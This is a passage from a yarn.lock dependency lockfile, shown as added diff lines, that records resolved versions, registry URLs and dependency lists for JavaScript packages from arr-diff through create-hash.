resolved "https://registry.yarnpkg.com/arr-diff/-/arr-diff-4.0.0.tgz#d6461074febfec71e7e15235761a329a5dc7c520" + +arr-flatten@^1.0.1, arr-flatten@^1.1.0: + version "1.1.0" + resolved "https://registry.yarnpkg.com/arr-flatten/-/arr-flatten-1.1.0.tgz#36048bbff4e7b47e136644316c99669ea5ae91f1" + +arr-union@^3.1.0: + version "3.1.0" + resolved "https://registry.yarnpkg.com/arr-union/-/arr-union-3.1.0.tgz#e39b09aea9def866a8f206e288af63919bae39c4" + +array-find-index@^1.0.1: + version "1.0.2" + resolved "https://registry.yarnpkg.com/array-find-index/-/array-find-index-1.0.2.tgz#df010aa1287e164bbda6f9723b0a96a1ec4187a1" + +array-union@^1.0.1: + version "1.0.2" + resolved "https://registry.yarnpkg.com/array-union/-/array-union-1.0.2.tgz#9a34410e4f4e3da23dea375be5be70f24778ec39" + dependencies: + array-uniq "^1.0.1" + +array-uniq@^1.0.1: + version "1.0.3" + resolved "https://registry.yarnpkg.com/array-uniq/-/array-uniq-1.0.3.tgz#af6ac877a25cc7f74e058894753858dfdb24fdb6" + +array-unique@^0.2.1: + version "0.2.1" + resolved "https://registry.yarnpkg.com/array-unique/-/array-unique-0.2.1.tgz#a1d97ccafcbc2625cc70fadceb36a50c58b01a53" + +array-unique@^0.3.2: + version "0.3.2" + resolved "https://registry.yarnpkg.com/array-unique/-/array-unique-0.3.2.tgz#a894b75d4bc4f6cd679ef3244a9fd8f46ae2d428" + +arrify@^1.0.1: + version "1.0.1" + resolved "https://registry.yarnpkg.com/arrify/-/arrify-1.0.1.tgz#898508da2226f380df904728456849c1501a4b0d" + +asn1.js@^4.0.0: + version "4.10.1" + resolved "https://registry.yarnpkg.com/asn1.js/-/asn1.js-4.10.1.tgz#b9c2bf5805f1e64aadeed6df3a2bfafb5a73f5a0" + dependencies: + bn.js "^4.0.0" + inherits "^2.0.1" + minimalistic-assert "^1.0.0" + +assert@^1.1.1: + version "1.4.1" + resolved "https://registry.yarnpkg.com/assert/-/assert-1.4.1.tgz#99912d591836b5a6f5b345c0f07eefc08fc65d91" + dependencies: + util "0.10.3" + +assign-symbols@^1.0.0: + version "1.0.0" + resolved 
"https://registry.yarnpkg.com/assign-symbols/-/assign-symbols-1.0.0.tgz#59667f41fadd4f20ccbc2bb96b8d4f7f78ec0367" + +async-each@^1.0.0: + version "1.0.1" + resolved "https://registry.yarnpkg.com/async-each/-/async-each-1.0.1.tgz#19d386a1d9edc6e7c1c85d388aedbcc56d33602d" + +async-limiter@~1.0.0: + version "1.0.0" + resolved "https://registry.yarnpkg.com/async-limiter/-/async-limiter-1.0.0.tgz#78faed8c3d074ab81f22b4e985d79e8738f720f8" + +async@^1.5.2: + version "1.5.2" + resolved "https://registry.yarnpkg.com/async/-/async-1.5.2.tgz#ec6a61ae56480c0c3cb241c95618e20892f9672a" + +atob@^2.1.1: + version "2.1.1" + resolved "https://registry.yarnpkg.com/atob/-/atob-2.1.1.tgz#ae2d5a729477f289d60dd7f96a6314a22dd6c22a" + +autocomplete.js@^0.29.0: + version "0.29.0" + resolved "https://registry.yarnpkg.com/autocomplete.js/-/autocomplete.js-0.29.0.tgz#0185f7375ee9daf068f7d52d794bc90dcd739fd7" + dependencies: + immediate "^3.2.3" + +autoprefixer@^6.3.1: + version "6.7.7" + resolved "https://registry.yarnpkg.com/autoprefixer/-/autoprefixer-6.7.7.tgz#1dbd1c835658e35ce3f9984099db00585c782014" + dependencies: + browserslist "^1.7.6" + caniuse-db "^1.0.30000634" + normalize-range "^0.1.2" + num2fraction "^1.2.2" + postcss "^5.2.16" + postcss-value-parser "^3.2.3" + +autoprefixer@^8.2.0: + version "8.6.3" + resolved "https://registry.yarnpkg.com/autoprefixer/-/autoprefixer-8.6.3.tgz#1d38a129e6a4582a565b6570d16f2d7d3de9cbf9" + dependencies: + browserslist "^3.2.8" + caniuse-lite "^1.0.30000856" + normalize-range "^0.1.2" + num2fraction "^1.2.2" + postcss "^6.0.22" + postcss-value-parser "^3.2.3" + +babel-code-frame@^6.26.0: + version "6.26.0" + resolved "https://registry.yarnpkg.com/babel-code-frame/-/babel-code-frame-6.26.0.tgz#63fd43f7dc1e3bb7ce35947db8fe369a3f58c74b" + dependencies: + chalk "^1.1.3" + esutils "^2.0.2" + js-tokens "^3.0.2" + +babel-helper-vue-jsx-merge-props@^2.0.3: + version "2.0.3" + resolved 
"https://registry.yarnpkg.com/babel-helper-vue-jsx-merge-props/-/babel-helper-vue-jsx-merge-props-2.0.3.tgz#22aebd3b33902328e513293a8e4992b384f9f1b6" + +babel-loader@8.0.0-beta.3: + version "8.0.0-beta.3" + resolved "https://registry.yarnpkg.com/babel-loader/-/babel-loader-8.0.0-beta.3.tgz#49efeea6e8058d5af860a18a6de88b8c1450645b" + dependencies: + find-cache-dir "^1.0.0" + loader-utils "^1.0.2" + mkdirp "^0.5.1" + util.promisify "^1.0.0" + +babel-plugin-dynamic-import-node@^1.2.0: + version "1.2.0" + resolved "https://registry.yarnpkg.com/babel-plugin-dynamic-import-node/-/babel-plugin-dynamic-import-node-1.2.0.tgz#f91631e703e0595e47d4beafbb088576c87fbeee" + dependencies: + babel-plugin-syntax-dynamic-import "^6.18.0" + +babel-plugin-syntax-dynamic-import@^6.18.0: + version "6.18.0" + resolved "https://registry.yarnpkg.com/babel-plugin-syntax-dynamic-import/-/babel-plugin-syntax-dynamic-import-6.18.0.tgz#8d6a26229c83745a9982a441051572caa179b1da" + +babel-plugin-transform-vue-jsx@^4.0.1: + version "4.0.1" + resolved "https://registry.yarnpkg.com/babel-plugin-transform-vue-jsx/-/babel-plugin-transform-vue-jsx-4.0.1.tgz#2c8bddce87a6ef09eaa59869ff1bfbeeafc5f88d" + dependencies: + esutils "^2.0.2" + +babel-runtime@^6.26.0: + version "6.26.0" + resolved "https://registry.yarnpkg.com/babel-runtime/-/babel-runtime-6.26.0.tgz#965c7058668e82b55d7bfe04ff2337bc8b5647fe" + dependencies: + core-js "^2.4.0" + regenerator-runtime "^0.11.0" + +babylon@7.0.0-beta.47: + version "7.0.0-beta.47" + resolved "https://registry.yarnpkg.com/babylon/-/babylon-7.0.0-beta.47.tgz#6d1fa44f0abec41ab7c780481e62fd9aafbdea80" + +balanced-match@^0.4.2: + version "0.4.2" + resolved "https://registry.yarnpkg.com/balanced-match/-/balanced-match-0.4.2.tgz#cb3f3e3c732dc0f01ee70b403f302e61d7709838" + +balanced-match@^1.0.0: + version "1.0.0" + resolved "https://registry.yarnpkg.com/balanced-match/-/balanced-match-1.0.0.tgz#89b4d199ab2bee49de164ea02b89ce462d71b767" + +base64-js@^1.0.2: + version "1.3.0" + 
resolved "https://registry.yarnpkg.com/base64-js/-/base64-js-1.3.0.tgz#cab1e6118f051095e58b5281aea8c1cd22bfc0e3" + +base@^0.11.1: + version "0.11.2" + resolved "https://registry.yarnpkg.com/base/-/base-0.11.2.tgz#7bde5ced145b6d551a90db87f83c558b4eb48a8f" + dependencies: + cache-base "^1.0.1" + class-utils "^0.3.5" + component-emitter "^1.2.1" + define-property "^1.0.0" + isobject "^3.0.1" + mixin-deep "^1.2.0" + pascalcase "^0.1.1" + +big.js@^3.1.3: + version "3.2.0" + resolved "https://registry.yarnpkg.com/big.js/-/big.js-3.2.0.tgz#a5fc298b81b9e0dca2e458824784b65c52ba588e" + +binary-extensions@^1.0.0: + version "1.11.0" + resolved "https://registry.yarnpkg.com/binary-extensions/-/binary-extensions-1.11.0.tgz#46aa1751fb6a2f93ee5e689bb1087d4b14c6c205" + +bluebird@^3.1.1, bluebird@^3.5.1: + version "3.5.1" + resolved "https://registry.yarnpkg.com/bluebird/-/bluebird-3.5.1.tgz#d9551f9de98f1fcda1e683d17ee91a0602ee2eb9" + +bn.js@^4.0.0, bn.js@^4.1.0, bn.js@^4.1.1, bn.js@^4.4.0: + version "4.11.8" + resolved "https://registry.yarnpkg.com/bn.js/-/bn.js-4.11.8.tgz#2cde09eb5ee341f484746bb0309b3253b1b1442f" + +boolbase@~1.0.0: + version "1.0.0" + resolved "https://registry.yarnpkg.com/boolbase/-/boolbase-1.0.0.tgz#68dff5fbe60c51eb37725ea9e3ed310dcc1e776e" + +boxen@^1.2.1: + version "1.3.0" + resolved "https://registry.yarnpkg.com/boxen/-/boxen-1.3.0.tgz#55c6c39a8ba58d9c61ad22cd877532deb665a20b" + dependencies: + ansi-align "^2.0.0" + camelcase "^4.0.0" + chalk "^2.0.1" + cli-boxes "^1.0.0" + string-width "^2.0.0" + term-size "^1.2.0" + widest-line "^2.0.0" + +brace-expansion@^1.1.7: + version "1.1.11" + resolved "https://registry.yarnpkg.com/brace-expansion/-/brace-expansion-1.1.11.tgz#3c7fcbf529d87226f3d2f52b966ff5271eb441dd" + dependencies: + balanced-match "^1.0.0" + concat-map "0.0.1" + +braces@^1.8.2: + version "1.8.5" + resolved "https://registry.yarnpkg.com/braces/-/braces-1.8.5.tgz#ba77962e12dff969d6b76711e914b737857bf6a7" + dependencies: + expand-range "^1.8.1" + 
preserve "^0.2.0" + repeat-element "^1.1.2" + +braces@^2.3.0, braces@^2.3.1: + version "2.3.2" + resolved "https://registry.yarnpkg.com/braces/-/braces-2.3.2.tgz#5979fd3f14cd531565e5fa2df1abfff1dfaee729" + dependencies: + arr-flatten "^1.1.0" + array-unique "^0.3.2" + extend-shallow "^2.0.1" + fill-range "^4.0.0" + isobject "^3.0.1" + repeat-element "^1.1.2" + snapdragon "^0.8.1" + snapdragon-node "^2.0.1" + split-string "^3.0.2" + to-regex "^3.0.1" + +brorand@^1.0.1: + version "1.1.0" + resolved "https://registry.yarnpkg.com/brorand/-/brorand-1.1.0.tgz#12c25efe40a45e3c323eb8675a0a0ce57b22371f" + +browserify-aes@^1.0.0, browserify-aes@^1.0.4: + version "1.2.0" + resolved "https://registry.yarnpkg.com/browserify-aes/-/browserify-aes-1.2.0.tgz#326734642f403dabc3003209853bb70ad428ef48" + dependencies: + buffer-xor "^1.0.3" + cipher-base "^1.0.0" + create-hash "^1.1.0" + evp_bytestokey "^1.0.3" + inherits "^2.0.1" + safe-buffer "^5.0.1" + +browserify-cipher@^1.0.0: + version "1.0.1" + resolved "https://registry.yarnpkg.com/browserify-cipher/-/browserify-cipher-1.0.1.tgz#8d6474c1b870bfdabcd3bcfcc1934a10e94f15f0" + dependencies: + browserify-aes "^1.0.4" + browserify-des "^1.0.0" + evp_bytestokey "^1.0.0" + +browserify-des@^1.0.0: + version "1.0.1" + resolved "https://registry.yarnpkg.com/browserify-des/-/browserify-des-1.0.1.tgz#3343124db6d7ad53e26a8826318712bdc8450f9c" + dependencies: + cipher-base "^1.0.1" + des.js "^1.0.0" + inherits "^2.0.1" + +browserify-rsa@^4.0.0: + version "4.0.1" + resolved "https://registry.yarnpkg.com/browserify-rsa/-/browserify-rsa-4.0.1.tgz#21e0abfaf6f2029cf2fafb133567a701d4135524" + dependencies: + bn.js "^4.1.0" + randombytes "^2.0.1" + +browserify-sign@^4.0.0: + version "4.0.4" + resolved "https://registry.yarnpkg.com/browserify-sign/-/browserify-sign-4.0.4.tgz#aa4eb68e5d7b658baa6bf6a57e630cbd7a93d298" + dependencies: + bn.js "^4.1.1" + browserify-rsa "^4.0.0" + create-hash "^1.1.0" + create-hmac "^1.1.2" + elliptic "^6.0.0" + inherits 
"^2.0.1" + parse-asn1 "^5.0.0" + +browserify-zlib@^0.2.0: + version "0.2.0" + resolved "https://registry.yarnpkg.com/browserify-zlib/-/browserify-zlib-0.2.0.tgz#2869459d9aa3be245fe8fe2ca1f46e2e7f54d73f" + dependencies: + pako "~1.0.5" + +browserslist@^1.3.6, browserslist@^1.5.2, browserslist@^1.7.6: + version "1.7.7" + resolved "https://registry.yarnpkg.com/browserslist/-/browserslist-1.7.7.tgz#0bd76704258be829b2398bb50e4b62d1a166b0b9" + dependencies: + caniuse-db "^1.0.30000639" + electron-to-chromium "^1.2.7" + +browserslist@^3.0.0, browserslist@^3.2.8: + version "3.2.8" + resolved "https://registry.yarnpkg.com/browserslist/-/browserslist-3.2.8.tgz#b0005361d6471f0f5952797a76fc985f1f978fc6" + dependencies: + caniuse-lite "^1.0.30000844" + electron-to-chromium "^1.3.47" + +buffer-from@^1.0.0: + version "1.1.0" + resolved "https://registry.yarnpkg.com/buffer-from/-/buffer-from-1.1.0.tgz#87fcaa3a298358e0ade6e442cfce840740d1ad04" + +buffer-xor@^1.0.3: + version "1.0.3" + resolved "https://registry.yarnpkg.com/buffer-xor/-/buffer-xor-1.0.3.tgz#26e61ed1422fb70dd42e6e36729ed51d855fe8d9" + +buffer@^4.3.0: + version "4.9.1" + resolved "https://registry.yarnpkg.com/buffer/-/buffer-4.9.1.tgz#6d1bb601b07a4efced97094132093027c95bc298" + dependencies: + base64-js "^1.0.2" + ieee754 "^1.1.4" + isarray "^1.0.0" + +builtin-modules@^1.0.0: + version "1.1.1" + resolved "https://registry.yarnpkg.com/builtin-modules/-/builtin-modules-1.1.1.tgz#270f076c5a72c02f5b65a47df94c5fe3a278892f" + +builtin-status-codes@^3.0.0: + version "3.0.0" + resolved "https://registry.yarnpkg.com/builtin-status-codes/-/builtin-status-codes-3.0.0.tgz#85982878e21b98e1c66425e03d0174788f569ee8" + +cacache@^10.0.4: + version "10.0.4" + resolved "https://registry.yarnpkg.com/cacache/-/cacache-10.0.4.tgz#6452367999eff9d4188aefd9a14e9d7c6a263460" + dependencies: + bluebird "^3.5.1" + chownr "^1.0.1" + glob "^7.1.2" + graceful-fs "^4.1.11" + lru-cache "^4.1.1" + mississippi "^2.0.0" + mkdirp "^0.5.1" + 
move-concurrently "^1.0.1" + promise-inflight "^1.0.1" + rimraf "^2.6.2" + ssri "^5.2.4" + unique-filename "^1.1.0" + y18n "^4.0.0" + +cache-base@^1.0.1: + version "1.0.1" + resolved "https://registry.yarnpkg.com/cache-base/-/cache-base-1.0.1.tgz#0a7f46416831c8b662ee36fe4e7c59d76f666ab2" + dependencies: + collection-visit "^1.0.0" + component-emitter "^1.2.1" + get-value "^2.0.6" + has-value "^1.0.0" + isobject "^3.0.1" + set-value "^2.0.0" + to-object-path "^0.3.0" + union-value "^1.0.0" + unset-value "^1.0.0" + +cache-loader@^1.2.2: + version "1.2.2" + resolved "https://registry.yarnpkg.com/cache-loader/-/cache-loader-1.2.2.tgz#6d5c38ded959a09cc5d58190ab5af6f73bd353f5" + dependencies: + loader-utils "^1.1.0" + mkdirp "^0.5.1" + neo-async "^2.5.0" + schema-utils "^0.4.2" + +call-me-maybe@^1.0.1: + version "1.0.1" + resolved "https://registry.yarnpkg.com/call-me-maybe/-/call-me-maybe-1.0.1.tgz#26d208ea89e37b5cbde60250a15f031c16a4d66b" + +camel-case@3.0.x: + version "3.0.0" + resolved "https://registry.yarnpkg.com/camel-case/-/camel-case-3.0.0.tgz#ca3c3688a4e9cf3a4cda777dc4dcbc713249cf73" + dependencies: + no-case "^2.2.0" + upper-case "^1.1.1" + +camelcase-keys@^4.0.0: + version "4.2.0" + resolved "https://registry.yarnpkg.com/camelcase-keys/-/camelcase-keys-4.2.0.tgz#a2aa5fb1af688758259c32c141426d78923b9b77" + dependencies: + camelcase "^4.1.0" + map-obj "^2.0.0" + quick-lru "^1.0.0" + +camelcase@^4.0.0, camelcase@^4.1.0: + version "4.1.0" + resolved "https://registry.yarnpkg.com/camelcase/-/camelcase-4.1.0.tgz#d545635be1e33c542649c69173e5de6acfae34dd" + +caniuse-api@^1.5.2: + version "1.6.1" + resolved "https://registry.yarnpkg.com/caniuse-api/-/caniuse-api-1.6.1.tgz#b534e7c734c4f81ec5fbe8aca2ad24354b962c6c" + dependencies: + browserslist "^1.3.6" + caniuse-db "^1.0.30000529" + lodash.memoize "^4.1.2" + lodash.uniq "^4.5.0" + +caniuse-db@^1.0.30000529, caniuse-db@^1.0.30000634, caniuse-db@^1.0.30000639: + version "1.0.30000856" + resolved 
"https://registry.yarnpkg.com/caniuse-db/-/caniuse-db-1.0.30000856.tgz#fbebb99abe15a5654fc7747ebb5315bdfde3358f" + +caniuse-lite@^1.0.30000844, caniuse-lite@^1.0.30000856: + version "1.0.30000856" + resolved "https://registry.yarnpkg.com/caniuse-lite/-/caniuse-lite-1.0.30000856.tgz#ecc16978135a6f219b138991eb62009d25ee8daa" + +capture-stack-trace@^1.0.0: + version "1.0.0" + resolved "https://registry.yarnpkg.com/capture-stack-trace/-/capture-stack-trace-1.0.0.tgz#4a6fa07399c26bba47f0b2496b4d0fb408c5550d" + +chalk@^1.1.3: + version "1.1.3" + resolved "https://registry.yarnpkg.com/chalk/-/chalk-1.1.3.tgz#a8115c55e4a702fe4d150abd3872822a7e09fc98" + dependencies: + ansi-styles "^2.2.1" + escape-string-regexp "^1.0.2" + has-ansi "^2.0.0" + strip-ansi "^3.0.0" + supports-color "^2.0.0" + +chalk@^2.0.0, chalk@^2.0.1, chalk@^2.1.0, chalk@^2.3.0, chalk@^2.3.2, chalk@^2.4.1: + version "2.4.1" + resolved "https://registry.yarnpkg.com/chalk/-/chalk-2.4.1.tgz#18c49ab16a037b6eb0152cc83e3471338215b66e" + dependencies: + ansi-styles "^3.2.1" + escape-string-regexp "^1.0.5" + supports-color "^5.3.0" + +chokidar@^2.0.2, chokidar@^2.0.3: + version "2.0.4" + resolved "https://registry.yarnpkg.com/chokidar/-/chokidar-2.0.4.tgz#356ff4e2b0e8e43e322d18a372460bbcf3accd26" + dependencies: + anymatch "^2.0.0" + async-each "^1.0.0" + braces "^2.3.0" + glob-parent "^3.1.0" + inherits "^2.0.1" + is-binary-path "^1.0.0" + is-glob "^4.0.0" + lodash.debounce "^4.0.8" + normalize-path "^2.1.1" + path-is-absolute "^1.0.0" + readdirp "^2.0.0" + upath "^1.0.5" + optionalDependencies: + fsevents "^1.2.2" + +chownr@^1.0.1: + version "1.0.1" + resolved "https://registry.yarnpkg.com/chownr/-/chownr-1.0.1.tgz#e2a75042a9551908bebd25b8523d5f9769d79181" + +chrome-trace-event@^1.0.0: + version "1.0.0" + resolved "https://registry.yarnpkg.com/chrome-trace-event/-/chrome-trace-event-1.0.0.tgz#45a91bd2c20c9411f0963b5aaeb9a1b95e09cc48" + dependencies: + tslib "^1.9.0" + +ci-info@^1.0.0: + version "1.1.3" + resolved 
"https://registry.yarnpkg.com/ci-info/-/ci-info-1.1.3.tgz#710193264bb05c77b8c90d02f5aaf22216a667b2" + +cipher-base@^1.0.0, cipher-base@^1.0.1, cipher-base@^1.0.3: + version "1.0.4" + resolved "https://registry.yarnpkg.com/cipher-base/-/cipher-base-1.0.4.tgz#8760e4ecc272f4c363532f926d874aae2c1397de" + dependencies: + inherits "^2.0.1" + safe-buffer "^5.0.1" + +clap@^1.0.9: + version "1.2.3" + resolved "https://registry.yarnpkg.com/clap/-/clap-1.2.3.tgz#4f36745b32008492557f46412d66d50cb99bce51" + dependencies: + chalk "^1.1.3" + +class-utils@^0.3.5: + version "0.3.6" + resolved "https://registry.yarnpkg.com/class-utils/-/class-utils-0.3.6.tgz#f93369ae8b9a7ce02fd41faad0ca83033190c463" + dependencies: + arr-union "^3.1.0" + define-property "^0.2.5" + isobject "^3.0.0" + static-extend "^0.1.1" + +clean-css@4.1.x: + version "4.1.11" + resolved "https://registry.yarnpkg.com/clean-css/-/clean-css-4.1.11.tgz#2ecdf145aba38f54740f26cefd0ff3e03e125d6a" + dependencies: + source-map "0.5.x" + +cli-boxes@^1.0.0: + version "1.0.0" + resolved "https://registry.yarnpkg.com/cli-boxes/-/cli-boxes-1.0.0.tgz#4fa917c3e59c94a004cd61f8ee509da651687143" + +cli-cursor@^2.0.0: + version "2.1.0" + resolved "https://registry.yarnpkg.com/cli-cursor/-/cli-cursor-2.1.0.tgz#b35dac376479facc3e94747d41d0d0f5238ffcb5" + dependencies: + restore-cursor "^2.0.0" + +clipboard@^2.0.0: + version "2.0.1" + resolved "https://registry.yarnpkg.com/clipboard/-/clipboard-2.0.1.tgz#a12481e1c13d8a50f5f036b0560fe5d16d74e46a" + dependencies: + good-listener "^1.2.2" + select "^1.1.2" + tiny-emitter "^2.0.0" + +clipboardy@^1.2.2: + version "1.2.3" + resolved "https://registry.yarnpkg.com/clipboardy/-/clipboardy-1.2.3.tgz#0526361bf78724c1f20be248d428e365433c07ef" + dependencies: + arch "^2.1.0" + execa "^0.8.0" + +clone@^1.0.2: + version "1.0.4" + resolved "https://registry.yarnpkg.com/clone/-/clone-1.0.4.tgz#da309cc263df15994c688ca902179ca3c7cd7c7e" + +co@^4.6.0: + version "4.6.0" + resolved 
"https://registry.yarnpkg.com/co/-/co-4.6.0.tgz#6ea6bdf3d853ae54ccb8e47bfa0bf3f9031fb184" + +coa@~1.0.1: + version "1.0.4" + resolved "https://registry.yarnpkg.com/coa/-/coa-1.0.4.tgz#a9ef153660d6a86a8bdec0289a5c684d217432fd" + dependencies: + q "^1.1.2" + +code-point-at@^1.0.0: + version "1.1.0" + resolved "https://registry.yarnpkg.com/code-point-at/-/code-point-at-1.1.0.tgz#0d070b4d043a5bea33a2f1a40e2edb3d9a4ccf77" + +collection-visit@^1.0.0: + version "1.0.0" + resolved "https://registry.yarnpkg.com/collection-visit/-/collection-visit-1.0.0.tgz#4bc0373c164bc3291b4d368c829cf1a80a59dca0" + dependencies: + map-visit "^1.0.0" + object-visit "^1.0.0" + +color-convert@^1.3.0, color-convert@^1.9.0: + version "1.9.2" + resolved "https://registry.yarnpkg.com/color-convert/-/color-convert-1.9.2.tgz#49881b8fba67df12a96bdf3f56c0aab9e7913147" + dependencies: + color-name "1.1.1" + +color-name@1.1.1: + version "1.1.1" + resolved "https://registry.yarnpkg.com/color-name/-/color-name-1.1.1.tgz#4b1415304cf50028ea81643643bd82ea05803689" + +color-name@^1.0.0: + version "1.1.3" + resolved "https://registry.yarnpkg.com/color-name/-/color-name-1.1.3.tgz#a7d0558bd89c42f795dd42328f740831ca53bc25" + +color-string@^0.3.0: + version "0.3.0" + resolved "https://registry.yarnpkg.com/color-string/-/color-string-0.3.0.tgz#27d46fb67025c5c2fa25993bfbf579e47841b991" + dependencies: + color-name "^1.0.0" + +color@^0.11.0: + version "0.11.4" + resolved "https://registry.yarnpkg.com/color/-/color-0.11.4.tgz#6d7b5c74fb65e841cd48792ad1ed5e07b904d764" + dependencies: + clone "^1.0.2" + color-convert "^1.3.0" + color-string "^0.3.0" + +colormin@^1.0.5: + version "1.1.2" + resolved "https://registry.yarnpkg.com/colormin/-/colormin-1.1.2.tgz#ea2f7420a72b96881a38aae59ec124a6f7298133" + dependencies: + color "^0.11.0" + css-color-names "0.0.4" + has "^1.0.1" + +colors@~1.1.2: + version "1.1.2" + resolved "https://registry.yarnpkg.com/colors/-/colors-1.1.2.tgz#168a4701756b6a7f51a12ce0c97bfa28c084ed63" + 
+commander@2.15.x, commander@^2.15.1, commander@~2.15.0: + version "2.15.1" + resolved "https://registry.yarnpkg.com/commander/-/commander-2.15.1.tgz#df46e867d0fc2aec66a34662b406a9ccafff5b0f" + +commander@~2.13.0: + version "2.13.0" + resolved "https://registry.yarnpkg.com/commander/-/commander-2.13.0.tgz#6964bca67685df7c1f1430c584f07d7597885b9c" + +common-tags@^1.4.0: + version "1.8.0" + resolved "https://registry.yarnpkg.com/common-tags/-/common-tags-1.8.0.tgz#8e3153e542d4a39e9b10554434afaaf98956a937" + +commondir@^1.0.1: + version "1.0.1" + resolved "https://registry.yarnpkg.com/commondir/-/commondir-1.0.1.tgz#ddd800da0c66127393cca5950ea968a3aaf1253b" + +component-emitter@^1.2.1: + version "1.2.1" + resolved "https://registry.yarnpkg.com/component-emitter/-/component-emitter-1.2.1.tgz#137918d6d78283f7df7a6b7c5a63e140e69425e6" + +concat-map@0.0.1: + version "0.0.1" + resolved "https://registry.yarnpkg.com/concat-map/-/concat-map-0.0.1.tgz#d8a96bd77fd68df7793a73036a3ba0d5405d477b" + +concat-stream@^1.5.0: + version "1.6.2" + resolved "https://registry.yarnpkg.com/concat-stream/-/concat-stream-1.6.2.tgz#904bdf194cd3122fc675c77fc4ac3d4ff0fd1a34" + dependencies: + buffer-from "^1.0.0" + inherits "^2.0.3" + readable-stream "^2.2.2" + typedarray "^0.0.6" + +configstore@^3.0.0: + version "3.1.2" + resolved "https://registry.yarnpkg.com/configstore/-/configstore-3.1.2.tgz#c6f25defaeef26df12dd33414b001fe81a543f8f" + dependencies: + dot-prop "^4.1.0" + graceful-fs "^4.1.2" + make-dir "^1.0.0" + unique-string "^1.0.0" + write-file-atomic "^2.0.0" + xdg-basedir "^3.0.0" + +connect-history-api-fallback@^1.5.0: + version "1.5.0" + resolved "https://registry.yarnpkg.com/connect-history-api-fallback/-/connect-history-api-fallback-1.5.0.tgz#b06873934bc5e344fef611a196a6faae0aee015a" + +consola@^1.2.0: + version "1.4.1" + resolved "https://registry.yarnpkg.com/consola/-/consola-1.4.1.tgz#4b1c6259c8db23f51e7cfb68cd383ec5ee298f0e" + dependencies: + chalk "^2.3.2" + figures "^2.0.0" + 
lodash "^4.17.5" + std-env "^1.1.0" + +console-browserify@^1.1.0: + version "1.1.0" + resolved "https://registry.yarnpkg.com/console-browserify/-/console-browserify-1.1.0.tgz#f0241c45730a9fc6323b206dbf38edc741d0bb10" + dependencies: + date-now "^0.1.4" + +console-control-strings@^1.0.0, console-control-strings@~1.1.0: + version "1.1.0" + resolved "https://registry.yarnpkg.com/console-control-strings/-/console-control-strings-1.1.0.tgz#3d7cf4464db6446ea644bf4b39507f9851008e8e" + +consolidate@^0.15.1: + version "0.15.1" + resolved "https://registry.yarnpkg.com/consolidate/-/consolidate-0.15.1.tgz#21ab043235c71a07d45d9aad98593b0dba56bab7" + dependencies: + bluebird "^3.1.1" + +constants-browserify@^1.0.0: + version "1.0.0" + resolved "https://registry.yarnpkg.com/constants-browserify/-/constants-browserify-1.0.0.tgz#c20b96d8c617748aaf1c16021760cd27fcb8cb75" + +content-disposition@~0.5.0: + version "0.5.2" + resolved "https://registry.yarnpkg.com/content-disposition/-/content-disposition-0.5.2.tgz#0cf68bb9ddf5f2be7961c3a85178cb85dba78cb4" + +content-type@^1.0.0: + version "1.0.4" + resolved "https://registry.yarnpkg.com/content-type/-/content-type-1.0.4.tgz#e138cc75e040c727b1966fe5e5f8c9aee256fe3b" + +convert-source-map@^1.1.0: + version "1.5.1" + resolved "https://registry.yarnpkg.com/convert-source-map/-/convert-source-map-1.5.1.tgz#b8278097b9bc229365de5c62cf5fcaed8b5599e5" + +cookies@~0.7.0: + version "0.7.1" + resolved "https://registry.yarnpkg.com/cookies/-/cookies-0.7.1.tgz#7c8a615f5481c61ab9f16c833731bcb8f663b99b" + dependencies: + depd "~1.1.1" + keygrip "~1.0.2" + +copy-concurrently@^1.0.0: + version "1.0.5" + resolved "https://registry.yarnpkg.com/copy-concurrently/-/copy-concurrently-1.0.5.tgz#92297398cae34937fcafd6ec8139c18051f0b5e0" + dependencies: + aproba "^1.1.1" + fs-write-stream-atomic "^1.0.8" + iferr "^0.1.5" + mkdirp "^0.5.1" + rimraf "^2.5.4" + run-queue "^1.0.0" + +copy-descriptor@^0.1.0: + version "0.1.1" + resolved 
"https://registry.yarnpkg.com/copy-descriptor/-/copy-descriptor-0.1.1.tgz#676f6eb3c39997c2ee1ac3a924fd6124748f578d" + +copy-webpack-plugin@^4.5.1: + version "4.5.1" + resolved "https://registry.yarnpkg.com/copy-webpack-plugin/-/copy-webpack-plugin-4.5.1.tgz#fc4f68f4add837cc5e13d111b20715793225d29c" + dependencies: + cacache "^10.0.4" + find-cache-dir "^1.0.0" + globby "^7.1.1" + is-glob "^4.0.0" + loader-utils "^1.1.0" + minimatch "^3.0.4" + p-limit "^1.0.0" + serialize-javascript "^1.4.0" + +core-js@^2.4.0, core-js@^2.5.3: + version "2.5.7" + resolved "https://registry.yarnpkg.com/core-js/-/core-js-2.5.7.tgz#f972608ff0cead68b841a16a932d0b183791814e" + +core-util-is@~1.0.0: + version "1.0.2" + resolved "https://registry.yarnpkg.com/core-util-is/-/core-util-is-1.0.2.tgz#b5fd54220aa2bc5ab57aab7140c940754503c1a7" + +cosmiconfig@^2.1.0, cosmiconfig@^2.1.1: + version "2.2.2" + resolved "https://registry.yarnpkg.com/cosmiconfig/-/cosmiconfig-2.2.2.tgz#6173cebd56fac042c1f4390edf7af6c07c7cb892" + dependencies: + is-directory "^0.3.1" + js-yaml "^3.4.3" + minimist "^1.2.0" + object-assign "^4.1.0" + os-homedir "^1.0.1" + parse-json "^2.2.0" + require-from-string "^1.1.0" + +cosmiconfig@^5.0.2: + version "5.0.5" + resolved "https://registry.yarnpkg.com/cosmiconfig/-/cosmiconfig-5.0.5.tgz#a809e3c2306891ce17ab70359dc8bdf661fe2cd0" + dependencies: + is-directory "^0.3.1" + js-yaml "^3.9.0" + parse-json "^4.0.0" + +create-ecdh@^4.0.0: + version "4.0.3" + resolved "https://registry.yarnpkg.com/create-ecdh/-/create-ecdh-4.0.3.tgz#c9111b6f33045c4697f144787f9254cdc77c45ff" + dependencies: + bn.js "^4.1.0" + elliptic "^6.0.0" + +create-error-class@^3.0.0: + version "3.0.2" + resolved "https://registry.yarnpkg.com/create-error-class/-/create-error-class-3.0.2.tgz#06be7abef947a3f14a30fd610671d401bca8b7b6" + dependencies: + capture-stack-trace "^1.0.0" + +create-hash@^1.1.0, create-hash@^1.1.2: + version "1.2.0" + resolved 
